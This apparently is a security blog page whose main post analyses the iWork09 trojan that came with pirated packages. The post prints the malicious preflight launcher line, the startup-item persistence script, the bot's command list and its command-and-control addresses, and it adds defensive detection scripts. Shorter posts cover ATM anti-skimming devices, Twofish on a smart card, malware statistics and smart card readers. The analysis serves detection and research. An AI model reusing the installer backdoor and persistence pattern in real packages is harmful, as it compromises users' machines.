iWork/CS4 Trojan In-Depth Analysis
Last week's Intego trojan alert caught quite a bit of attention in the Mac community and was picked up by probably every IT news site around the world. As this might be the first really serious trojan to threaten Mac OS X users, let's try to analyze it.
First, this is a Universal Binary, so it affects Macs running on both Intel and PowerPC processors.

The SHA-1 fingerprint of iworkservices is 55d754b95ab9b34bdd848300045c3e11caf67ecf.
The iWork09 package is basically a repackaged version of the iWork09 Trial download from apple.com, with a serial number to unlock it included. To add their trojan/backdoor to the package, the authors had to do some work first.

Shown here is the content of the iWork09Trial.mpkg install package. Both Info.plist and iWorkTrial.dist control the behaviour of the installation process for the whole package; the sub-packages are listed in them.
from the Info.plist
from the iWorkTrial.dist
Now, the iWorkServices.pkg install package contains the usual files created by Apple’s Package Maker, a pretty nifty, straightforward and GUI-based tool for creating installation packages for Mac OS X*.
*Available from within the Developer Tools.

The interesting files here are preflight, a script which the Installer executes before the actual program install, and iworkservices, which is the trojan itself.
#!/bin/sh
"$1/Contents/Resources/iworkservices" &
The preflight script simply executes the trojan in a shell. $1 is the first argument the Installer passes to every preflight script: the full on-disk path of the package being installed, so the line points at the copy of iworkservices inside the package's own Resources directory. The trailing & backgrounds it, so the trojan keeps running while the legitimate iWork installation proceeds normally and the user sees nothing unusual.
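A practical check that follows from this, added here as an example and not part of the original analysis: before installing a package of doubtful origin, list its Installer scripts and look for lines that execute something shipped inside the package itself. The Python script below does that for a bundle-style .pkg/.mpkg tree. The package layout it builds for the demo is constructed to mirror the description above (file names are the ones from the post, the exact directory layout is an assumption); the set of script names it looks for and the regular expression are mine.

```python
"""Added example (not from the original post): triage the Installer scripts of
a Mac OS X bundle-style .pkg/.mpkg before installing it. It walks the package
tree, collects the scripts the Installer runs (preflight/postflight/preinstall/
postinstall/preupgrade/postupgrade) and flags lines that launch a file from
the package's own Resources directory, especially backgrounded with '&'.

The demo package tree is constructed; it mirrors the post's description.
"""
import os
import re
import tempfile

INSTALLER_SCRIPTS = {"preflight", "postflight", "preinstall", "postinstall",
                     "preupgrade", "postupgrade"}

# "$1/Contents/Resources/..." -- the Installer passes the package path as $1
LAUNCH_FROM_RESOURCES = re.compile(r'"?\$1/Contents/Resources/\S+')


def find_installer_scripts(package_root):
    """Return [(relative script path, script text)] for every Installer script."""
    found = []
    for dirpath, _dirs, files in os.walk(package_root):
        for name in files:
            if name in INSTALLER_SCRIPTS:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    found.append((os.path.relpath(full, package_root), fh.read()))
    return sorted(found)


def suspicious_lines(script_text):
    """Lines that execute something shipped inside the package itself.

    A backgrounded launch ('&') is what the iWorkServices preflight does: the
    payload keeps running while the legitimate install proceeds.
    """
    hits = []
    for line in script_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if LAUNCH_FROM_RESOURCES.search(stripped):
            hits.append({"line": stripped, "background": stripped.endswith("&")})
    return hits


def triage_package(package_root):
    """Map each Installer script to its suspicious lines (empty list = clean)."""
    return {path: suspicious_lines(text)
            for path, text in find_installer_scripts(package_root)}


def build_demo_package():
    """Constructed package tree: one benign postflight, one backdoored preflight."""
    root = tempfile.mkdtemp(prefix="iWork09Trial.mpkg-")
    bad = os.path.join(root, "Contents", "Packages", "iWorkServices.pkg",
                       "Contents", "Resources")
    os.makedirs(bad)
    with open(os.path.join(bad, "preflight"), "w") as fh:
        fh.write('#!/bin/sh\n"$1/Contents/Resources/iworkservices" &\n')
    with open(os.path.join(bad, "iworkservices"), "wb") as fh:
        fh.write(b"\xca\xfe\xba\xbe")  # fat-binary magic only: a constructed stand-in
    good = os.path.join(root, "Contents", "Packages", "Keynote.pkg",
                        "Contents", "Resources")
    os.makedirs(good)
    with open(os.path.join(good, "postflight"), "w") as fh:
        fh.write("#!/bin/sh\n# constructed benign script\ntouch /tmp/keynote-installed\n")
    return root


if __name__ == "__main__":
    for script, hits in triage_package(build_demo_package()).items():
        print(script, "->", hits or "clean")
```

Run it against a real package with `triage_package("/Volumes/iWork09/iWork09Trial.mpkg")` (path assumed); anything it flags deserves a look with strings before the Installer is allowed to run it.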
Now comes the interesting part. Running otool showed that it is a plain C/C++ program, not Objective-C. Furthermore, running strings on iworkservices yields some details of the trojan's behaviour.
__dyld_make_delayed_module_initializer_calls
__dyld_mod_term_funcs
/usr/lib/libSystem.B.dylib
__cxa_atexit
__cxa_finalize
atexit
/System/Library/StartupItems/iWorkServices
/usr/bin/iWorkServices
cp %s %s
/System/Library/StartupItems/iWorkServices/StartupParameters.plist
/System/Library/StartupItems/iWorkServices/iWorkServices
chmod 755 /System/Library/StartupItems/iWorkServices/iWorkServices
Description = "iWorkServices";
Provides = ("iWorkServices");
Requires = ("Network");
OrderPreference = "None";
#!/bin/sh
/usr/bin/iWorkServices &
iWorkServices
socks
system
httpget
httpgeted
rand
sleep
banadd
banclear
p2plock
p2punlock
nodes
leafs
unknowns
p2pport
p2pmode
p2ppeer
p2ppeerport
p2ppeertype
clear
p2pihistsize
p2pihist
platform
script
sendlogs
uptime
shell
rshell
GET %s HTTP/1.0
GET %s HTTP/1.0
Host: %s
Accept: text/html
Content-Length
/tmp/.iWorkServices
p2pnodes
%s:%d
/dev/urandom
%.2X
http://
PANIC: unprotected error in call to Lua API (%s)
[...]
excerpt from the output of strings; see the full output here
As you can see, it first copies itself to /System/Library/StartupItems/iWorkServices/iWorkServices and /usr/bin/iWorkServices, writes a StartupParameters.plist for the startup item, sets rwxr-xr-x (chmod 755) permissions on the executable and finally starts the copy at /usr/bin/iWorkServices. The startup item's executable is nothing but a two-line shell wrapper that backgrounds /usr/bin/iWorkServices. Note the Requires = ("Network"); line in the configuration file: it tells SystemStarter, which handles the legacy StartupItems at boot, to start this item only after the "Network" service has been brought up, so the bot is started on every boot once the machine has network connectivity.
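The persistence this leaves behind can be audited without a signature. The following Python script is an added example (not from the post) that walks the StartupItems directories, parses each item's old-style StartupParameters.plist with a small hand-written parser (plistlib does not read that OpenStep text format), checks the item's executable and flags items whose executable is a one-line shell wrapper backgrounding some other binary, which is exactly the pattern above. It takes a filesystem prefix so it can be exercised on a constructed tree; on a real Mac pass "/". The demo tree it builds is constructed; the iWorkServices item's contents are the ones quoted above.

```python
"""Added example (not from the original post): audit legacy StartupItems for
the persistence pattern the iWorkServices trojan uses. Runs against a
filesystem prefix so it can be demonstrated on a constructed tree.
"""
import os
import re
import stat
import tempfile

STARTUP_DIRS = ("System/Library/StartupItems", "Library/StartupItems")

# one statement of the flat OpenStep plist:  key = "value";  or  key = ("a", "b");
PLIST_ENTRY = re.compile(r'(\w+)\s*=\s*(\([^)]*\)|"[^"]*"|\w+)\s*;')


def parse_openstep_plist(text):
    """Minimal parser for the flat OpenStep-format plist StartupItems use."""
    params = {}
    for key, raw in PLIST_ENTRY.findall(text):
        if raw.startswith("("):
            params[key] = re.findall(r'"([^"]*)"', raw)
        else:
            params[key] = raw.strip('"')
    return params


def wrapper_target(script_path):
    """If the executable is a shell script whose only command is backgrounded,
    return that command; a real StartupItem sources rc.common and defines
    StartService/StopService instead."""
    try:
        with open(script_path, encoding="utf-8", errors="replace") as fh:
            lines = [l.strip() for l in fh if l.strip() and not l.startswith("#")]
    except OSError:
        return None
    if len(lines) == 1 and lines[0].endswith("&"):
        return lines[0].rstrip("&").strip()
    return None


def audit_startup_items(root="/"):
    """Return one report dict per StartupItem found under root."""
    reports = []
    for rel in STARTUP_DIRS:
        base = os.path.join(root, rel)
        if not os.path.isdir(base):
            continue
        for item in sorted(os.listdir(base)):
            item_dir = os.path.join(base, item)
            plist = os.path.join(item_dir, "StartupParameters.plist")
            exe = os.path.join(item_dir, item)  # SystemStarter runs <dir>/<dir name>
            params = {}
            if os.path.isfile(plist):
                with open(plist, encoding="utf-8", errors="replace") as fh:
                    params = parse_openstep_plist(fh.read())
            mode = os.stat(exe).st_mode if os.path.exists(exe) else 0
            reports.append({
                "item": item,
                "executable": exe,
                "exists": os.path.exists(exe),
                "world_executable": bool(mode & stat.S_IXOTH),
                "requires": params.get("Requires", []),
                "provides": params.get("Provides", []),
                "launches_in_background": wrapper_target(exe),
            })
    return reports


def build_demo_root():
    """Constructed root: the trojan's item plus a harmless item for contrast."""
    root = tempfile.mkdtemp(prefix="startupitems-")
    bad = os.path.join(root, "System/Library/StartupItems/iWorkServices")
    os.makedirs(bad)
    with open(os.path.join(bad, "StartupParameters.plist"), "w") as fh:
        fh.write('{\n  Description = "iWorkServices";\n  Provides = ("iWorkServices");\n'
                 '  Requires = ("Network");\n  OrderPreference = "None";\n}\n')
    with open(os.path.join(bad, "iWorkServices"), "w") as fh:
        fh.write("#!/bin/sh\n/usr/bin/iWorkServices &\n")
    os.chmod(os.path.join(bad, "iWorkServices"), 0o755)
    good = os.path.join(root, "Library/StartupItems/LoggerDemo")  # constructed
    os.makedirs(good)
    with open(os.path.join(good, "StartupParameters.plist"), "w") as fh:
        fh.write('{ Description = "LoggerDemo"; Provides = ("LoggerDemo"); Requires = ("Disks"); }\n')
    with open(os.path.join(good, "LoggerDemo"), "w") as fh:
        fh.write('#!/bin/sh\n. /etc/rc.common\nStartService () { echo demo; }\nRunService "$1"\n')
    return root


if __name__ == "__main__":
    for rep in audit_startup_items(build_demo_root()):
        flag = "SUSPECT" if rep["launches_in_background"] else "ok"
        print(f'{rep["item"]:16} requires={rep["requires"]} -> {flag} {rep["launches_in_background"] or ""}')
```

A hit from this script is a lead, not a verdict: confirm it by hashing the backgrounded binary (the SHA-1 above for this sample) and by checking for the node cache at /tmp/.iWorkServices.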
As others have already found out, this trojan is actually a bot. The commands the bot accepts from its controller are listed below.
socks
system
httpget
httpgeted
rand
sleep
banadd
banclear
p2plock
p2punlock
nodes
leafs
unknowns
p2pport
p2pmode
p2ppeer
p2ppeerport
p2ppeertype
clear
p2pihistsize
p2pihist
platform
script
sendlogs
uptime
shell
rshell
p2pnodes
So this looks like a peer-to-peer botnet. When started, it contacts the master server(s) listening at 69.92.177.146:59201 and qwfojzlk.freehostia.com:1024 over HTTP and downloads a list of the other p2p nodes to /tmp/.iWorkServices.
GET %s HTTP/1.0
GET %s HTTP/1.0
Host: %s
Accept: text/html
Content-Length
/tmp/.iWorkServices
p2pnodes
%s:%d
/dev/urandom
%.2X
http://
Right after that it sleeps until it receives commands from the master server.
What is also interesting is the reference to the Lua API.
PANIC: unprotected error in call to Lua API (%s)
Lua is a powerful yet small embeddable scripting language. It seems the bad guys are making their lives easier, too.
Disassembling the whole trojan gave about 43,000 lines of disassembly, but this probably includes the embedded Lua interpreter. If anyone has some spare time, grab the disassembly here.
According to Intego, as of January 22 about 20,000 people had already downloaded this pirated copy. So there is supposedly already a botnet of 20,000+ Macs running DDoS attacks against some sites using a PHP script.
If anyone is investigating this botnet a little further, please let me know.
Thanks go to Methusela Cebrian Ferrer from iThreats for the initial insight into the trojan.
Banks fight back against skimming attacks
Posted by: cordney* in security, technology on October 1st, 2008
Surprised, no, rather taken aback, I stood in front of my bank's ATM last week: an additional device with a green padlock symbol on it had been mounted in front of the machine's card reader (picture below).
Given the many ATM manipulations lately, one has naturally become cautious, so I took my card back out of the machine and called my bank. After a short inquiry with another department they gave me the all-clear. The device, they said, is an additional security measure meant to prevent further manipulation. They thanked me for reporting it, though, and promised to put up a notice so that other customers are informed.
Further research revealed the device to be an "anti-skimming module", a device that can detect manipulation and then react accordingly.
How the whole thing is supposed to work, however, they won't say. Secrecy when it comes to security, now where have we heard that before. If anyone has insider knowledge, please share! I'll ask my professors about it when I get the chance. Meanwhile the fraudsters are looking for another way to copy the cards. They simply manipulate other readers, namely the readers for the access control at the branch entrance. Most banks reacted to that as well, and removed those readers entirely.
It remains to be seen whether the banks' efforts bear fruit.
We made third! or Twofish on a smart card
In a practical course this summer term the task was to implement the Twofish block cipher, a former AES candidate, on an embedded device: a smart card with an ATmega163 microcontroller on board. A prize was promised for the team with the best performance, based on clock cycles per key schedule/encryption/decryption and on code size. Three weeks were given, 10 teams participated and we came third, yeah!
In particular, the main decision was how to handle the S-boxes. The S-box keys are derived from the main key and can be precomputed. So the main question was whether to save clock cycles and precompute them, or to compute them on the fly while running encryption/decryption and save SRAM in the microcontroller. We decided to precompute them, as this would give our implementation a significant performance increase.
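To make the trade-off concrete, here is an added example in Python (not our smart-card code, and not cycle-accurate) of the Twofish layer the decision is about: the key-dependent S-boxes of g() for a 128-bit key, written once with the four 256-byte tables precomputed and once recomputed from the key words on every call, with a check that both agree. The q0/q1 permutations and the MDS matrix are Twofish's fixed constants; the two 32-bit key words S0 and S1 that the real key schedule derives from the key with the RS code are taken as given (that step is omitted), so the S values used in the demo are constructed placeholders, not a real key.

```python
"""Added example (not from the course or the post): Twofish's key-dependent
S-box layer for a 128-bit key, precomputed versus computed on the fly.

  build_sboxes(S)     precomputes 4 x 256 bytes once (1 KB of table RAM);
                      afterwards g() is four look-ups plus the MDS multiply.
  g_on_the_fly(x, S)  recomputes the q0/q1 chain for every byte of every call:
                      no table RAM, but three q look-ups and two XORs per byte
                      instead of one look-up.
"""

# Twofish's fixed 8-bit permutations q0 and q1 as their 4-bit t-tables
Q_TABLES = (
    ((0x8, 0x1, 0x7, 0xD, 0x6, 0xF, 0x3, 0x2, 0x0, 0xB, 0x5, 0x9, 0xE, 0xC, 0xA, 0x4),
     (0xE, 0xC, 0xB, 0x8, 0x1, 0x2, 0x3, 0x5, 0xF, 0x4, 0xA, 0x6, 0x7, 0x0, 0x9, 0xD),
     (0xB, 0xA, 0x5, 0xE, 0x6, 0xD, 0x9, 0x0, 0xC, 0x8, 0xF, 0x3, 0x2, 0x4, 0x7, 0x1),
     (0xD, 0x7, 0xF, 0x4, 0x1, 0x2, 0x6, 0xE, 0x9, 0xB, 0x3, 0x0, 0x8, 0x5, 0xC, 0xA)),
    ((0x2, 0x8, 0xB, 0xD, 0xF, 0x7, 0x6, 0xE, 0x3, 0x1, 0x9, 0x4, 0x0, 0xA, 0xC, 0x5),
     (0x1, 0xE, 0x2, 0xB, 0x4, 0xC, 0x3, 0x7, 0x6, 0xD, 0xA, 0x5, 0xF, 0x9, 0x0, 0x8),
     (0x4, 0xC, 0x7, 0x5, 0x1, 0x6, 0x9, 0xA, 0x0, 0xE, 0xD, 0x8, 0x2, 0xB, 0x3, 0xF),
     (0xB, 0x9, 0x5, 0x1, 0xC, 0x3, 0xD, 0xE, 0x6, 0x4, 0x7, 0xF, 0x2, 0x0, 0x8, 0xA)),
)


def q(which, x):
    """Fixed permutation q0 (which=0) or q1 (which=1) on one byte."""
    t0, t1, t2, t3 = Q_TABLES[which]
    a, b = x >> 4, x & 0xF
    # b' = a ^ ROR4(b, 1) ^ 8a mod 16, a' = a ^ b
    a, b = a ^ b, (a ^ ((b >> 1) | ((b & 1) << 3)) ^ (8 * a)) & 0xF
    a, b = t0[a], t1[b]
    a, b = a ^ b, (a ^ ((b >> 1) | ((b & 1) << 3)) ^ (8 * a)) & 0xF
    return (t3[b] << 4) | t2[a]


# 128-bit key: byte i of h() is q[C][ q[B][ q[A][x] ^ S1_i ] ^ S0_i ]
H_CHAIN = ((0, 0, 1), (1, 0, 0), (0, 1, 1), (1, 1, 0))


def sbox_byte(i, x, S):
    """Key-dependent S-box s_i on one byte, computed on the fly from S."""
    qa, qb, qc = H_CHAIN[i]
    s1 = (S[1] >> (8 * i)) & 0xFF
    s0 = (S[0] >> (8 * i)) & 0xFF
    return q(qc, q(qb, q(qa, x) ^ s1) ^ s0)


def build_sboxes(S):
    """Precompute the four key-dependent S-boxes: 4 x 256 = 1024 bytes."""
    return [bytes(sbox_byte(i, x, S) for x in range(256)) for i in range(4)]


def gf_mul(a, b):
    """Multiply in GF(2^8) modulo x^8 + x^6 + x^5 + x^3 + 1 (0x169), the MDS field."""
    r = 0
    for _ in range(8):
        if b & 1:
            r ^= a
        a = (a << 1) ^ (0x169 if a & 0x80 else 0)
        b >>= 1
    return r & 0xFF


MDS = ((0x01, 0xEF, 0x5B, 0x5B), (0x5B, 0xEF, 0xEF, 0x01),
       (0xEF, 0x5B, 0x01, 0xEF), (0xEF, 0x01, 0xEF, 0x5B))


def mds(y):
    """MDS matrix times the four S-box output bytes; little-endian word out."""
    out = 0
    for row in range(4):
        acc = 0
        for col in range(4):
            acc ^= gf_mul(MDS[row][col], y[col])
        out |= acc << (8 * row)
    return out


def g_with_tables(x, tables):
    """g(x) with precomputed S-boxes: four look-ups + MDS."""
    return mds([tables[i][(x >> (8 * i)) & 0xFF] for i in range(4)])


def g_on_the_fly(x, S):
    """g(x) recomputing every S-box byte from S on each call."""
    return mds([sbox_byte(i, (x >> (8 * i)) & 0xFF, S) for i in range(4)])


if __name__ == "__main__":
    S = (0x01234567, 0x89ABCDEF)  # constructed placeholder, not derived from a key
    tables = build_sboxes(S)
    for x in (0, 1, 0xDEADBEEF, 0xFFFFFFFF):
        assert g_with_tables(x, tables) == g_on_the_fly(x, S)
    print("q0(0)=%#x q1(0)=%#x table RAM=%d bytes" % (q(0, 0), q(1, 0), sum(map(len, tables))))
```

On the microcontroller the same choice looks like this: the precomputed variant pays the 1024 sbox_byte() evaluations once in the key schedule and then spends one table read per byte per round, while the on-the-fly variant keeps the 1 KB of SRAM free and pays the full q-chain for all four bytes in every one of the 16 rounds, which is where the cycle difference comes from.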
These are the statistics..
All quiet on the western front..
..but interesting numbers! That is how today's HGI talk could be summarized. The guest was the head of the Security Labs at G DATA Software AG, a Bochum-based IT security software company that offers anti-virus software, among other things, to private and business customers.
The topic of the talk, "Malicious code on the Internet", was promptly renamed "Malicious code in web pages" at the start, because that is what the talk was really about. It began with the two currently most widespread infection methods: direct downloads and drive-by downloads. That is certainly nothing new for security specialists, but when you consider that only a year ago the best-known infection route was infected e-mail attachments, which now hardly occur any more, the progress of the protection techniques in e-mail clients becomes quite clear. The attackers have simply looked for an easier target: the browser.
Now to the interesting numbers (approximate values):
- 10-12 million bots are active worldwide
- 30,000 new bots are added every day
- over 80% of spam comes from about 200 organizations
- 10,000 website defacements per day
- 3,000 DDoS attacks per day! (rising steadily since the beginning of the year)
Overall quite an interesting talk, if somewhat short on detail, but then one could fill whole evenings with malware!
Smart Card Readers for Mac OS X
Getting non-standard hardware to work is not that easy. The first thing you do is search the internet for devices reported to work flawlessly with Mac OS X. This came up for me when looking for compatible smart card readers; it is just one example of this "finding the needle in the haystack". Normally Apple provides no hints on working devices either. But for smart card readers I accidentally found a note in an Apple document which lists compatible readers for Mac OS X. I hope this blog post ranks #1 on Google soon.
Compatible Smart Card Readers:
Mac OS X Tiger includes built-in support for many types of smart card readers.
Compatible smart card readers include:
* Any certified Chip Card Interface Device (CCID) USB class reader
* USB readers such as Athena, CryptoCard, GemPlus, and SCM
* PC Card readers such as CryptoCard, SCM, and OmniKey
* USB dongle readers such as OmniKey and GemPlus
Source: Apple Smart Card Setup Guide
Tags: smartcard, apple, usb reader, reader, compatible


